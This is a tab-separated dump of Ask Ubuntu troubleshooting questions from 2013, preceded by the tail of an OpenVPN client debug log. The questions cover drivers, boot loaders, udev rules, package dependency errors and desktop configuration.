10:44:22 2013 us=985574 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985587 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985599 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985610 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985623 pkcs11_pin_cache_period = -1 thu oct 24 10:44:22 2013 us=985634 pkcs11_id = ' [ undef ] ' thu oct 24 10:44:22 2013 us=985646 pkcs11_id_management = disabled thu oct 24 10:44:22 2013 us=985661 server_network = 0.0.0.0 thu oct 24 10:44:22 2013 us=985674 server_netmask = 0.0.0.0 thu oct 24 10:44:22 2013 us=985690 server_network_ipv6 = : : thu oct 24 10:44:22 2013 us=985702 server_netbits_ipv6 = 0 thu oct 24 10:44:22 2013 us=985714 server_bridge_ip = 0.0.0.0 thu oct 24 10:44:22 2013 us=985727 server_bridge_netmask = 0.0.0.0 thu oct 24 10:44:22 2013 us=985739 server_bridge_pool_start = 0.0.0.0 thu oct 24 10:44:22 2013 us=985752 server_bridge_pool_end = 0.0.0.0 thu oct 24 10:44:22 2013 us=985764 ifconfig_pool_defined = disabled thu oct 24 10:44:22 2013 us=985776 ifconfig_pool_start = 0.0.0.0 thu oct 24 10:44:22 2013 us=985789 ifconfig_pool_end = 0.0.0.0 thu oct 24 10:44:22 2013 us=985801 ifconfig_pool_netmask = 0.0.0.0 thu oct 24 10:44:22 2013 us=985813 ifconfig_pool_persist_filename = ' [ undef ] ' thu oct 24 10:44:22 2013 us=985825 ifconfig_pool_persist_refresh_freq = 600 thu oct 24 10:44:22 2013 us=985837 ifconfig_ipv6_pool_defined = disabled thu oct 24 10:44:22 2013 us=985850 ifconfig_ipv6_pool_base = : : thu oct 24 10:44:22 2013 us=985862 ifconfig_ipv6_pool_netbits = 0 thu oct 24 10:44:22 2013 us=985873 n_bcast_buf = 256 thu oct 24 10:44:22 2013 us=985885 tcp_queue_limit = 64 thu oct 24 10:44:22 2013 us=985897 real_hash_size = 256 thu oct 24 10:44:22 2013 us=985909 virtual_hash_size = 256 thu oct 24 10:44:22 2013 us=985921 client_connect_script = ' [ undef ] ' thu oct 24 10:44:22 2013 us=985933 learn_address_script = ' [ undef ] ' thu oct 24 10:44:22 2013 us=985945 client_disconnect_script = ' [ undef ] ' thu oct 24 10:44:22 2013 us=985957 client_config_dir = ' [ undef ] ' thu oct 24 10:44:22 2013 us=985969 ccd_exclusive = disabled thu oct 24 10:44:22 2013 us=985981 tmp_dir = '/tmp' thu oct 24 10:44:22 2013 us=985993 push_ifconfig_defined = disabled thu oct 24 10:44:22 2013 us=986005 push_ifconfig_local = 0.0.0.0 thu oct 24 10:44:22 2013 us=986018 push_ifconfig_remote_netmask = 0.0.0.0 thu oct 24 10:44:22 2013 us=986030 push_ifconfig_ipv6_defined = disabled thu oct 24 10:44:22 2013 us=986043 push_ifconfig_ipv6_local = : :/0 thu oct 24 10:44:22 2013 us=986055 push_ifconfig_ipv6_remote = : : thu oct 24 10:44:22 2013 us=986067 enable_c2c = disabled thu oct 24 10:44:22 2013 us=986078 duplicate_cn = disabled thu oct 24 10:44:22 2013 us=986090 cf_max = 0 thu oct 24 10:44:22 2013 us=986102 cf_per = 0 thu oct 24 10:44:22 2013 us=986114 max_clients = 1024 thu oct 24 10:44:22 2013 us=986126 max_routes_per_client = 256 thu oct 24 10:44:22 2013 us=986138 auth_user_pass_verify_script = ' [ undef ] ' thu oct 24 10:44:22 2013 us=986150 auth_user_pass_verify_script_via_file = disabled thu oct 24 10:44:22 2013 us=986162 port_share_host = ' [ undef ] ' thu oct 24 10:44:22 2013 us=986174 port_share_port = 0 thu oct 24 10:44:22 2013 us=986186 client = enabled thu oct 24 10:44:22 2013 us=986197 pull = enabled thu oct 24 10:44:22 2013 us=986209 auth_user_pass_file = 'xxx.xxx.net' thu oct 24 10:44:22 2013 us=986224 openvpn 2.3.2 x86_64-redhat-linux-gnu [ ssl ( openssl ) ] [ lzo ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ ipv6 ] built on sep 12 2013 thu oct 24 10:44:22 2013 us=986272 warning : file 'xxx.xxx.net ' is group or others accessible thu oct 24 10:44:22 2013 us=986364 warning : file 'access ' is group or others accessible thu oct 24 10:44:22 2013 us=992786 deprecated tls cipher name 'rc4-md5 ' , please use iana name 'tls-rsa-with-rc4-128-md5' thu oct 24 10:44:22 2013 us=993925 prng init md=sha1 size=36 thu oct 24 10:44:22 2013 us=994043 warning : file 'ta ' is group or others accessible thu oct 24 10:44:22 2013 us=994056 control channel authentication : using 'ta ' as a openvpn static key file thu oct 24 10:44:22 2013 us=994073 outgoing control channel authentication : using 160 bit message hash 'sha1 ' for hmac authentication thu oct 24 10:44:22 2013 us=994090 outgoing control channel authentication : hmac key : 32f63f7f ff6b12ac c2b22076 45f5795e a2f18054 thu oct 24 10:44:22 2013 us=994103 outgoing control channel authentication : hmac size=20 block_size=20 thu oct 24 10:44:22 2013 us=994113 incoming control channel authentication : using 160 bit message hash 'sha1 ' for hmac authentication thu oct 24 10:44:22 2013 us=994125 incoming control channel authentication : hmac key : 596cce0c 1db846b6 0cbe5f50 dee44fb6 cbdc945c thu oct 24 10:44:22 2013 us=994137 incoming control channel authentication : hmac size=20 block_size=20 thu oct 24 10:44:22 2013 us=994172 lzo compression initialized thu oct 24 10:44:22 2013 us=994189 mtu dynamic mtu=0 , flags=1 , 0 - > 168 thu oct 24 10:44:22 2013 us=994204 pid packet_id_init tcp_mode=1 seq_backtrack=64 time_backtrack=15 thu oct 24 10:44:22 2013 us=994245 pid packet_id_init tcp_mode=1 seq_backtrack=64 time_backtrack=15 thu oct 24 10:44:22 2013 us=994256 pid packet_id_init tcp_mode=1 seq_backtrack=64 time_backtrack=15 thu oct 24 10:44:22 2013 us=994287 pid packet_id_init tcp_mode=1 seq_backtrack=64 time_backtrack=15 thu oct 24 10:44:22 2013 us=994297 control channel mtu parms [ l:1544 d:168 ef:68 eb:0 et:0 el:0 ] thu oct 24 10:44:22 2013 us=994315 mtu dynamic mtu=1450 , flags=2 , 1544 - > 1450 thu oct 24 10:44:22 2013 us=995759 socket buffers : r= [ 87380- > 131072 ] s= [ 16384- > 131072 ] thu oct 24 10:44:22 2013 us=995822 getaddrinfo flags=0x010b ai_family=2 ai_socktype=1 thu oct 24 10:44:23 2013 us=671675 resolve_remote flags=0x010b phase=1 rrs=0 sig=-1 status=0 thu oct 24 10:44:23 2013 us=671757 data channel mtu parms [ l:1544 d:1450 ef:44 eb:135 et:0 el:0 af:3/1 ] thu oct 24 10:44:23 2013 us=671817 local options string : 'v4 , dev-type tun , link-mtu 1544 , tun-mtu 1500 , proto tcpv4_client , comp-lzo , keydir 1 , cipher bf-cbc , auth sha1 , keysize 128 , tls-auth , key-method 2 , tls-client' thu oct 24 10:44:23 2013 us=671844 expected remote options string : 'v4 , dev-type tun , link-mtu 1544 , tun-mtu 1500 , proto tcpv4_server , comp-lzo , keydir 0 , cipher bf-cbc , auth sha1 , keysize 128 , tls-auth , key-method 2 , tls-server' thu oct 24 10:44:23 2013 us=671894 local options hash ( ver=v4 ) : 'ee93268d' thu oct 24 10:44:23 2013 us=671927 expected remote options hash ( ver=v4 ) : 'bd577cd1' thu oct 24 10:44:23 2013 us=671964 attempting to establish tcp connection with [ af_inet ] 124.248.205.5:443 [ nonblock ] thu oct 24 10:44:24 2013 us=672384 tcp connection established with [ af_inet ] 124.248.205.5:443 thu oct 24 10:44:24 2013 us=672477 send to http proxy : 'connect localhost:1194 http/1.0' thu oct 24 10:44:24 2013 us=672631 attempting basic proxy-authorization thu oct 24 10:44:24 2013 us=672662 send to http proxy : 'proxy-authorization : basic 77u/y29udgfjddpzdxbwb3j0qhrlbmfjes5jb20=' thu oct 24 10:44:24 2013 us=912932 http proxy returned : 'http/1.0 407 proxy authentication required' thu oct 24 10:44:24 2013 us=913015 proxy requires authentication thu oct 24 10:44:24 2013 us=913045 proxy requires authentication thu oct 24 10:44:24 2013 us=913120 pid packet_id_free thu oct 24 10:44:24 2013 us=913189 pid packet_id_free thu oct 24 10:44:24 2013 us=913220 pid packet_id_free thu oct 24 10:44:24 2013 us=913250 pid packet_id_free thu oct 24 10:44:24 2013 us=913288 pid packet_id_free thu oct 24 10:44:24 2013 us=913315 pid packet_id_free thu oct 24 10:44:24 2013 us=913352 pid packet_id_free thu oct 24 10:44:24 2013 us=913380 pid packet_id_free thu oct 24 10:44:24 2013 us=913483 tcp/udp : closing socket thu oct 24 10:44:24 2013 us=913580 pid packet_id_free thu oct 24 10:44:24 2013 us=913619 sigterm [ soft , init_instance ] received , process exiting thu oct 24 10:44:24 2013 us=914080 pkcs # 11 : removing providers thu oct 24 10:44:24 2013 us=914106 pkcs # 11 : releasing sessions thu oct 24 10:44:24 2013 us=914128 pkcs # 11 : terminating slotevent thu oct 24 10:44:24 2013 us=914151 pkcs # 11 : marking as uninitialized
364026	swap left alt with left win in saucy ( 13.10 )	how do i swap the left alt and the left super ( `` windows '' ) keys in saucy salamander ? i just upgraded and i have noticed the keyboard layout dialog has changed , and i can no longer find the options window . i use this option because occasionally i use a sun keyboard that has super next to space , which i 'm not used to .
364029	click on indicator to open app window on top	when i click on indicator icon on panel , for example qbittorrent , clementine , ... etc , the app window opens in background so i have to click on unity launcher icon or use alt + tab to get the windows forward . is there a way to open app windows on top of other desktop windows right away from panel icon ? ? ? also both right and left buttons open indicator menu ... is there a way that right button opens menu and left button opens the app window ... ? ? ? thanks ...
364030	why would 70-persistent-net.rules have no effect ?	i 've got a saucy server with a lot of nics and they end up with weird names like `` rename19 '' . i know interface names can be changed by modifying the /etc/udev/rules.d/70-persistent-net.rules file . the first clue that something is wrong is that that file did not exist even though it 's supposed to be created automatically . so i decided to write my own based on advice from linux from scratch : action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:06:00.0 '' , name= '' eth0 '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:06:00.1 '' , name= '' eth1 '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:06:00.2 '' , name= '' eth2 '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:06:00.3 '' , name= '' eth3 '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:0c:00.0 '' , name= '' mezz0 '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:0c:00.1 '' , name= '' mezz1 '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:1b:00.0 '' , name= '' slot1a '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:1b:00.1 '' , name= '' slot1b '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:20:00.0 '' , name= '' slot2a '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:20:00.1 '' , name= '' slot2b '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:11:00.0 '' , name= '' slot3a '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:11:00.1 '' , name= '' slot3b '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:8b:00.0 '' , name= '' slot4a '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:8b:00.1 '' , name= '' slot4b '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:90:00.0 '' , name= '' slot5a '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:90:00.1 '' , name= '' slot5b '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:95:00.0 '' , name= '' slot6a '' action== '' add '' , subsystem== '' net '' , bus== '' pci '' , kernels== '' 0000:95:00.1 '' , name= '' slot6b '' ( i 'm matching on pci ids instead of mac addresses because i have multiple identical machines that i want to apply this configuration to . ) after rebooting , nothing has changed . it 's like these rules are n't even being read . there 's not much going on in dmesg either : $ dmesg | grep udev [ 3.196629 ] systemd-udevd [ 323 ] : starting version 204 [ 6.719140 ] systemd-udevd [ 550 ] : starting version 204 [ 38.695050 ] init : udev-fallback-graphics main process ( 1658 ) terminated with status 1
364033	is my graphics card in use or not ?	i have a samsung series 7 np730u3e which is running ubuntu gnome 13.10 . this computer have an intel core i5 3337u an amd radeon hd 8570m on the inside . ubuntu 13.10 is said to have driver support for this graphics card , but i am not sure whether or not this is the case . when i check system settings > details it says `` graphics : intel速 ivybridge mobile '' and lspci | grep vga returns vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) . but lshw -c video returns *-display description : display controller product : mars [ radeon hd 8730m ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:47 memory : e0000000-efffffff memory : f7e00000-f7e3ffff ioport : e000 ( size=256 ) memory : f7e40000-f7e5ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : f7800000-f7bfffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) what is the case ? is my graphics card is use , or do my laptop have undiscovered powers yet to yield ?
364034	can not record sound after update	after update to 12.04.3 , sound recorder application no longer records , i am using gnome not unity ... . all other sound functions are working ... i have opened alsamixer and adjusted levels there but nothing ... thanks in advance for any direction
364036	hp boot load failure	i 've installed ubuntu on a partition on my hp . if i boot from cd it will let me boot to ubuntu , but if i dont it boots automatically to windows without giving me the option to boot to ubunto . suggestions ?
364037	help re rdsap application download	urgent help required please . i need to use rdsap software , it is a windows silverlight package . i have got 'wine ' and thought i could get it to work but nothing happens . i do n't really know anything about computers/programming and so have faffed about trying all sorts to no avail . the link to the software is here if you are interested ... .. http : //courses.stroma.com/gdadomestic/software.php thank you in advance for any assistance you can give . warm wishes bex
364039	13.10/sis 771/671 consoles ( ctrl-alt-f* ) are n't working in fallback mode	i 'm installing ubuntu 13.10 in an old computer with a sis 771/671 video board . it 's too old to run unity , so i had to use fallback mode . the startup and desktop are ok , but when i try to use to the consoles ( ctrl-alt-f* ) video changes to an unsupported mode and all i get is a rolling garbage screen . the shutdown screen is in the same situation . anyone knows how to get the consoles ( ctrl-alt-f* ) working in fallback mode with this board ? thanks
364040	rserpoolsocket.c:354	i get the following messages when starting and stopping services . 22-oct-2013 16:05:58.8785 : p1494.7f5d069de740 @ servername rserpoolsocket.c:354 doregistration ( ) 22-oct-2013 16:05:58.8786 : error : ( re- ) registration failed : no registrar available registration : how can this be fixed ?
364042	install codeigniter on apache	i already have php and apache installed on my ubuntu 12.04 . i want to install codeigniter which is a php framework . i followed the link : how to install codeigniter ? . but its too complicated and also i do not want to create symlinks and mount and all the stuff mentioned there . installation instruction are also on the codegniter site i.e . http : //ellislab.com/codeigniter/user-guide/installation/index.html , but those are not elaborative and little confusing . i will be very thankful if anyone can please provide a simple way to install codeigniter with apache server .
364046	ubuntu 13.10 amd/ati proprietary driver slow boot time , lengthy login/logout delays	ubuntu 13.10 is causing me major headaches with my amd/ati hd 5770 gpu . below is a list of problems i am currently encountering . 1 ) the boot time is extended by at least 25s after installing catalyst 13.11 beta . using open source radeon drivers , my boot time till the login screen is ~10s . with catalyst 13.11 beta installed , the boot time increases to ~35s . this was not the case in ubuntu 13.04 , 12.10 or 12.04 . i have done the driver installation manually ( instructions from wiki.cchtml.com ) and using software center and there is no difference . i have not tried the catalyst 13.8 beta driver . 2 ) the delay between logging in and unity being displayed is ~10-15s for both open source and proprietary drivers . during the delay , it 's just a black screen . whenever i logout , there is again a ~10-15s delay with the login screen appearing stuck before lightdm allows me to enter my password again . this is ridiculous ! yes , i could stick with open source radeon drivers but i would like to install steam and play my valve collection on the machine . is anybody else encountering similar issues ?
364048	ubuntu 13.10 vs 12.04 lts	i am migrating my workflow to ubuntu from windows . i have a macbook pro at home and i really enjoy being able to use the workspaces feature on ubuntu to increase my productivity . as myself being someone that is n't very familiar with doing command line things and has n't worked with linux a whole lot other than doing basic commands like cd , ls , rm , screen , and sudo . i was wondering what you think would be the best choice for a ubuntu version . i am looking for ease of use as well as stability . i spend most of my time working with eclipse , as well as writing documents . on a side note , right now i have a pretty high end workstation , but i am using a crappy notebook 2.5 inch 1tb hard drive for my system . would it be worth it to switch to a top of the line ssd , or would the difference not really be noticeable ? how difficult would it be for a newcommer to setup the system with the os and important folders running on a ssd and then other folders for storage running on a hd .
364049	tripple boot install with windows mbr	i have 2 hard drives , each 1tb . first drive has only windows 7 . the second drive has kali installed on logical partitions # 5 ( /boot ) , # 6 ( / ) , # 7 ( /home ) , and # 8 ( swap ) . the bootloader is installed in /dev/sdb5 . it also has ubuntu installed on logical partitions # 9 ( /boot ) , # 10 ( / ) , # 11 ( /home ) , and # 12 ( swap ) . i want to use windows bootloader , so i use easybcd to configure the boot menu . easybcd sees my second drive partitions as # 1 , # 2 , # 3 , ... , # 8 . i then add kali selecting second drive # 1 ( /boot ) partition , and ubuntu selecting its # 5 ( /boot ) partition . after this my menu has choices of windows 7 ( default ) , kali , and ubuntu . the problem is that whether i select kali or ubuntu i always boot kali ! any idea on how to enable ubuntu boot while also keep using windows bootloader in mbr ?
364050	why are there so many devices in /dev ?	i read that your devices are listed in /dev . i do not have nearly as many devices attached to my system as are listed in that directory . why are there so many devices there ? and how do i get information about a particular one ?
364051	how do you preseed an ssh key ?	i tried this : d-i preseed/late_command string mkdir -p /target/root/.ssh d-i preseed/late_command string cp /cdrom/id_rsa.pub /target/root/.ssh/authorized_keys d-i preseed/late_command string chmod -r go-rwx /target/root/.ssh ( i 'm using a usb installer and i put id_rsa.pub in the root directory of the usb drive . ) the /root/.ssh directory is not created and the installer complains that the chmod command failed ( not surprising if the directory does n't exist ) .
364053	ubuntu 13.04 sound problem after following weird commands	after launching a few commands : echo autospawn = no > > ~/.config/pulse/client.conf # use ~/.pulse/client.conf on ubuntu < = 12.10 killall pulseaudio $ lang=c pulseaudio -vvvv -- log-time=1 > ~/pulseverbose.log 2 > & 1 my sound does not work . ( just with the speakers , with headphones it works but i can not change the volume ) the sound icon on the top right corner does show a speaker with a single non continuous line . i can not change the volume ; it is frozen . there can be an extremely low output of the sound ( i hear something but i am not sure ... ) it does not show a single output device that is avalaible , not even the `` dummie '' . i have tried to reset pulseaudio , alsa , remove it , purging it , reinstalling it , without having success . edit : i have tried launching pulseaudio via the terminal . it worked : d however , i am very surprised why it does not automatically start at the start of the computer . any ideas ? here the console output : w : [ pulseaudio ] authkey.c : failed to open cookie file '/home/simonm/.config/pulse/cookie ' : no such file or directory w : [ pulseaudio ] authkey.c : failed to load authorization key '/home/simonm/.config/pulse/cookie ' : no such file or directory w : [ pulseaudio ] authkey.c : failed to open cookie file '/home/simonm/.pulse-cookie ' : no such file or directory w : [ pulseaudio ] authkey.c : failed to load authorization key '/home/simonm/.pulse-cookie ' : no such file or directory
364054	failed i3wm install package has unment dependinces	tried installing i3wm from these instructions using the ubuntu ppa http : //i3wm.org/docs/repositories.html got this error when i typed in the final command apt-get install i3 sudo apt-get install i3 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : i3 : depends : i3-wm ( = 4.6.1-1+g4.6-88-ge99158e1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . when i tried downloading the .deb file and running it i get an error in the software center saying '' dependency is not satisfiable : i3-wm ( =4.5.1-2 ) any ideas i am pretty much a noob
364055	extended display - nightmare	i have been struggling for quite a while , and i hope one of you can shed some lights on my issue . i am using xubuntu 13.10 ( ubuntu 12.04lts behaves the same way , higher version would n't install , linuxmint did n't install , fedora did n't install ) . i am trying to set extend display for two dell monitors 1900x1200 . it works great when in mirror mode , but i just can not extend the display . either one monitor goes to sleep and the other is unresponsive , or both work but are unusable . this is a link to the picture of my monitors in mirror mode this is link showing what happens after i try to extend the desktop i get the same results if i use arandr or the built in configuration utility . i have an ati radeon x300 card . i can not use proprietary catalyst drivers ( i would have to use the legacy ones , which would force me into using much older version of the os ) . extension is possible with windows . i am hoping someone can come up with tweaks that would allow me to run an extended desktop . i truly love xubuntu ( and ubuntu , unfortunately , unity is a bit too heavy for my old pc , and i have to run in 2d mode , so 12.04 is as high as i can go ) . i have tried everything i could find online , but nothing worked thus far . i believe some configuration or something i am missing might work . please , if you have any idea , do not hesitate . thanks guys .
364057	can i reinstall and format an encrypted hard-drive ?	in layman 's terms , i 'm essentially trying to do a reset on my computer . it 's my secondary desktop , so i do n't have anything important on it . but since i moved , i misplaced my passphrase for the disk encryption . can i just reinstall ubuntu and format the hard drive completely ? get rid of the encryption and wipe the drive ?
364058	how to properly add webapps to unity on 13.10	i 'm new to ubuntu , and one of the features that made the change from windows was the integrated webapps . i installed ubuntu 13.10 , installed the unity-webapps-service and the unity-chromium-extension via terminal . once i opened gmail , facebook , google docs , etc ... they all offered me to install it on ubuntu . but all i get is the icon on the applications menu , there 's no integration with the top bar or the hud . does anyone know how can i solve this ?
364059	problems with php-server ( now : broken apache2 ) - âunmet dependencies '' - ubtuntu server with plesk	i have a ubuntu server with plesk insalled . my englisch and my `` linux '' ist not very great ! since a few days my php does n't work . if i load a php site my browser download the php file instead of parsing the php code . root @ v41251 : ~ # sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : php5-sqlite the following packages will be upgraded : php5-sqlite 1 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . 3 not fully installed or removed . need to get 0 b/27.6 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 80740 files and directories currently installed . ) preparing to replace php5-sqlite 5.3.10-1ubuntu3.6 ( using ... /php5-sqlite_5.3.10- 1ubuntu3.8_amd64.deb ) ... unpacking replacement php5-sqlite ... dpkg : error processing /var/cache/apt/archives/php5-sqlite_5.3.10- 1ubuntu3.8_amd64.deb ( -- unpack ) : unable to install new version of `/usr/share/doc/php5-sqlite ' : no such file or directory no apport report written because the error message indicates an issue on the local system processing triggers for libapache2-mod-php5 ... action 'configtest ' failed . the apache error log may have more information . your apache2 configuration is broken , so we 're not restarting it for you . errors were encountered while processing : /var/cache/apt/archives/php5-sqlite_5.3.10-1ubuntu3.8_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if i tried to uninstall apache2 , i get the following message the following packages have unmet dependencies : php5-sqlite : depends : php5-common ( = 5.3.10-1ubuntu3.6 ) but 5.3.10-1ubuntu3.8 is to be installed the same with php5-common the following packages have unmet dependencies : libapache2-mod-php5 : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but it is not going to be installed php5 : depends : php5-common ( > = 5.3.10-1ubuntu3.8 ) but it is not going to be installed php5-cgi : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but it is not going to be installed php5-cli : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but it is not going to be installed php5-curl : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but it is not going to be installed php5-gd : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but it is not going to be installed php5-mysql : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but it is not going to be installed php5-sqlite : depends : php5-common ( = 5.3.10-1ubuntu3.6 ) but it is not going to be installed php5-xsl : depends : php5-common ( = 5.3.10-1ubuntu3.8 ) but it is not going to be installed psa-php5-configurator : depends : php5-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i also tried sudo apt-get clean , sudo apt-get autoclean , sudo dpkg -- configure -a but my linux knowledge is very small i also tried to comment out the last files from /etc/apache2/mods-available/php5.conf now the configuration file of my apache is destroyd , so i cant restart my apache . root @ v41251 : ~ # sudo /etc/init.d/apache2 reload apache2 : syntax error on line 214 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/httpd.conf : no such file or directory action 'configtest ' failed . the apache error log may have more information . ... fail ! and i tried to reinstall my apache with sudo apt-get remove -- purge $ ( dpkg -l apache* | grep ii | awk ' { print $ 2 } ' ) & & sudo apt-get install apache2 can you help me ?
364062	issue with amd drivers	i recently made a linux box and installed 32bit ubuntu 13.04 by accident , at that time the amd drivers worked flawlessly . as soon as i installed the 64-bit version i began getting super-user errors , i check the forum on it and it did not help me because i do n't know what the gnome menu is or how to access , please help me and forgive my ignorance .
364063	i ca n't boot from usb : error setting up gfxboot	i have a toshiba nb305 netbook , so if i want to install ubuntu i have to do it by an usb . i download the iso from the official webside and burnt it to the usb and when i try to install the system i get an error in a black window : graphics initialization failled ; error setting up gfxboot ; boot : _ and the window do n't move from there . i 've tried with other versions , but the result is the same . what 's the problem and how i can solve it ?
364064	no wireless networks , bcm4313	just bought this little asus 10 inch laptop that came with ubuntu 12.04 . everything at my home was fine : wireless identified and connected . as soon as i went to my girlfriend 's house the trouble started . i could n't connect to wireless ( authentication ... times out and asks for authentication ) i started doing internet searching , tried a few solutions posted on line using terminal commands . no solutions . i decided to upgraded to 12.10-13.04 and that left me with a worse problem : i can no longer see any networks what so ever . wireless card is on , with out a doubt . wired connection works . i have been fumbling with driver versions to no .avail , and have no idea which driver i am currently running i have a vague idea of what terminal lines to run : lshw : resources : irq:17 memory : f7d00000-f7dfffff *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth2 version : 01 serial : dc:85 : de:56 : c4 : ea width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : f7d00000-f7d03fff iwconfig : eth1 no wireless extensions . eth2 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . i am new and excited to start my ubuntu and linux life and this is only the first of my few hic cups i am sure ! : ) thanks all update : report from 2nd answer talon @ black1015e : ~ $ sudo apt-get remove -- purge bcmwl-kernel-source [ sudo ] password for talon : reading package lists ... done building dependency tree reading state information ... done package 'bcmwl-kernel-source ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . talon @ black1015e : ~ $ wget http : //us.archive.ubuntu.com/ubuntu/pool/restricted/b/bcmwl/bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb -- 2013-10-22 18:50:32 -- http : //us.archive.ubuntu.com/ubuntu/pool/restricted/b/bcmwl/bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb resolving us.archive.ubuntu.com ( us.archive.ubuntu.com ) ... 2001:67c:1562 : :15 , 2001:67c:1562 : :13 , 2001:67c:1562 : :14 , ... connecting to us.archive.ubuntu.com ( us.archive.ubuntu.com ) |2001:67c:1562 : :15|:80 ... connected . http request sent , awaiting response ... 200 ok length : 1181334 ( 1.1m ) [ application/x-debian-package ] saving to : ‘bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb’ 100 % [ ====================================== > ] 1,181,334 3.37mb/s in 0.3s 2013-10-22 18:50:33 ( 3.37 mb/s ) - ‘bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb’ saved [ 1181334/1181334 ] talon @ black1015e : ~ $ arvh no command 'arvh ' found , did you mean : command 'arch ' from package 'coreutils ' ( main ) arvh : command not found talon @ black1015e : ~ $ arch x86_64 talon @ black1015e : ~ $ sudo dpkg -i bcmwl*.deb selecting previously unselected package bcmwl-kernel-source . ( reading database ... 171895 files and directories currently installed . ) unpacking bcmwl-kernel-source ( from bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb ) ... setting up bcmwl-kernel-source ( 5.100.82.112+bdcom-0ubuntu3 ) ... loading new bcmwl-5.100.82.112+bdcom dkms files ... first installation : checking all kernels ... building only for 3.8.0-32-generic building for architecture x86_64 building initial module for 3.8.0-32-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.8.0-32-generic/updates/dkms/ depmod ... ... .. dkms : install completed . error : module b43 is not currently loaded error : module b43legacy is not currently loaded error : module ssb is not currently loaded error : module bcm43xx is not currently loaded error : module brcm80211 is not currently loaded error : module brcmfmac is not currently loaded update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-32-generic rebooting now
364065	another `` failed to download repository information ''	i 've tried all the suggestions i 've been able to find , but i 'm still getting the error msg . the thing i think is different about my case is that none of the files indicated by the details of the msg . can be found in settings -- -- - > other software . i 've tried posting the details of the error msg. , but i do n't rank the privilege . any suggestions ?
364068	problem displaying panels and menu in kubuntu 13.10	after updating kubuntu to 13.10 the panels and menu stopped displaying normally . what it looks like now is : https : //drive.google.com/folderview ? id=0b9w7i5ijbxahzzjunzdwqjhqnfu & usp=sharing the problem is that the same happens also in kubuntu livecd . how can i solve that ? i 'm running toshiba satellite a200-14d with 3gb ram , default nvidia graphic card and win7hp on the other partition .
